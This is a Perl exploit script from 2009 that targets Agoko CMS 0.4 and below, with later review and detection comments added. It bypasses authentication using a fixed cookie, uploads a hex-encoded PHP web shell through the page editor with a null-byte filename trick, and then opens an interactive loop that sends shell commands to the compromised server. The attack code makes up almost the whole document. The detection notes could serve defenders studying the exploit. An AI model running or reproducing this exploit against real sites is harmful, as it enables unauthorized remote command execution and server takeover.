# Title : Agoko CMS <= 0.4 Remote Command Execution Exploit
# Published : 2009-09-09
# Author : StAkeR
#!/usr/bin/perl
# Usage banner, printed unconditionally before the arguments are looked at.
# `q~...~` is a non-interpolating quote, so nothing inside is expanded.
# NOTE(review): the script has no `use strict;`/`use warnings;` anywhere.
print q~
--------------------------------------------------
Agoko CMS <= 0.4 remote commands execution exploit
by staker
mail: staker[at]hotmail[dot]it
--------------------------------------------------
[*] Usage -> perl [xpl.pl] [host] [path]
[*] Example -> perl agk.pl localhost /Agoko
~;
#>-----------<#
#>- Working -<#
#>-----------<#########################################
# staker[death]:~/Desktop$ perl a.pl 127.0.0.1 /agoko #
# #
# -------------------------------------------------- #
# Agoko CMS <= 0.4 remote commands execution exploit #
# by staker #
# mail: staker[at]hotmail[dot]it #
# -------------------------------------------------- #
# #
# [*] Usage -> perl [xpl.pl] [host] [path] #
# [*] Example -> perl agk.pl localhost /Agoko #
# #
# shell already exists. #
# #
# Agoko[shell]:~$ uname -n -r #
# #
# death 2.6.27-7-generic #
#######################################################
use IO::Socket;
use LWP::Simple;
# Two positional arguments: the target host and the CMS install path.
# A missing path makes the script exit silently (status 0); neither value
# is validated or encoded before being interpolated into requests below.
my $host = shift;
my $path = shift || exit(0);
check_shell($host,$path);
# Probe for a previously planted page and branch on the answer: a response
# containing the `bany wtf` marker means the page is already there, so the
# interactive loop is entered; otherwise inject_shell() is called.
# NOTE(review): the empty `()` prototype is not enforced, because the only
# call site (above) is compiled before this definition is seen.
sub check_shell() {
my $host = $_[0];
# `$!` is errno; it is not set by a missing argument, so this `die`
# message is effectively empty.
my $path = $_[1] || die $!;
# Raw HTTP/1.1 request exactly as archived. From a defender's side the
# fixed `Cookie: bany=...` header, the `Lynx (textmode)` User-Agent and a
# GET for content/shell_vup.php are all literal, log-visible indicators.
my $packet = "GET /$path/content/shell_vup.php HTTP/1.1rn".
"Host: $hostrn".
"Cookie: bany=love_mern".
"User-Agent: Lynx (textmode)rn".
"Connection: closernrn";
# give_kt() returns the whole raw response (headers and body) as one string;
# a case-insensitive substring match is the only success test.
if (give_kt($host,$packet) =~ /bany wtf/i) {
print "[*] shell already exists.n";
load_cmd($host,$path);
}
else {
print "[*] exploiting..n";
inject_shell($host,$path);
}
}
# Submit a new page through the CMS admin page editor and, when the CMS
# reports success, hand over to the interactive loop. The request carries
# no authentication beyond the same fixed `bany=` cookie used in
# check_shell(); the page body is supplied as an escape-encoded string.
sub inject_shell() {
my ($host,$path) = @_;
# Escape-encoded page body, assembled from string concatenation. It contains
# the same `bany wtf` text that check_shell() later looks for in the
# response, which is how the two routines recognise each other's work.
my $shell = "x3Cx3Fx70x68x70x20x20x20x20x20x20x65x72x72".
"x6Fx72x5Fx72x65x70x6Fx72x74x69x6Ex67x28x45".
"x5Fx41x4Cx4Cx29x3Bx20x20x20x20x20x20x20x20".
"x20x20x20x20x69x66x20x28x69x73x73x65x74x28".
"x24x5Fx47x45x54x5Bx27x63x6Dx64x27x5Dx29x29".
"x20x20x20x20x20x20x20x20x20x20x70x61x73x73".
"x74x68x72x75x28x73x74x72x69x70x73x6Cx61x73".
"x68x65x73x28x24x5Fx47x45x54x5Bx27x63x6Dx64".
"x27x5Dx29x29x3Bx20x20x20x20x20x20x65x6Cx73".
"x65x20x20x20x20x20x20x20x20x20x64x69x65x28".
"x22x62x61x6Ex79x20x77x74x66x22x29x3Bx20x20".
"x20x20x20x20x3Fx3Ex20";
# Form fields: a `filename` ending in `.php` followed by an `x00` sequence,
# the page text, and the German `Speichern` ("save") submit button value.
# Detection: a filename parameter ending in `.php` on admintools/editpage-2.php
# is the observable artifact of this step.
my $data = "filename=shell_vup.phpx00&text=$shell&Submit=Speichern";
my $packet = "POST /$path/admintools/editpage-2.php HTTP/1.1rn".
"Host: $hostrn".
"User-Agent: Mozilla/4.5 [en] (Win95; U)rn".
"Cookie: bany=love_mern".
"Content-Type: application/x-www-form-urlencodedrn".
"Content-Length: ".length($data)."rn".
"Connection: closernrn".
$data;
# `erfolgreich eingetragen` is the CMS's German "entered successfully" text;
# it is the sole success criterion, so any other reply is treated as failure.
if (give_kt($host,$packet) =~ /erfolgreich eingetragen/i)
{
load_cmd($host,$path)
}
else
{
die "[*] Exploit failed.n";
}
}
# Interactive read-eval loop: reads one line from STDIN per iteration and
# fetches content/shell_vup.php with it as the `cmd` query parameter,
# printing the body via LWP::Simple::getprint. Exits only on `exit`,
# `quit` or `out` (case-insensitive) or on EOF-induced undef matching.
sub load_cmd() {
my $host = $_[0];
my $path = $_[1];
while (1)
{
print "nAgoko[shell]:~$ ";
# NOTE(review): on EOF `<STDIN>` returns undef; chomp/regex then run
# with an undefined value and the loop spins rather than terminating.
chomp (my $cmd = <STDIN>);
exit(0) if $cmd =~ /^(exit|quit|out)+$/i;
# The line is interpolated into the URL verbatim. Detection: every
# command shows up in the web server access log as a `cmd=` query string.
getprint("http://$host/$path/content/shell_vup.php?cmd=$cmd");
}
}
# Minimal raw HTTP client: open a plain TCP connection to port 80 on
# $input, write $heads unchanged, read until the peer closes, and return
# everything received as one string (headers included). No TLS, no
# timeout, no status-line parsing.
sub give_kt() {
my $input = $_[0];
# `$!` is not set by a missing argument, so this `die` prints no reason.
my $heads = $_[1] || die $!;
# Stays undef if nothing is read; the callers then regex-match undef.
my $result;
# Port 80 is hard-coded. NOTE(review): on connect failure IO::Socket::INET
# puts its error text in `$@`; `$!` may be empty at this point.
my $socket = IO::Socket::INET->new(
PeerAddr => $input,
PeerPort => 80,
Proto => 'tcp'
) || die $!;
# Return value of send() is not checked.
$socket->send($heads);
# Relies on the request's `Connection: close` to get EOF; a keep-alive
# server would block here indefinitely.
while (<$socket>) { $result .= $_; }
return $result;
}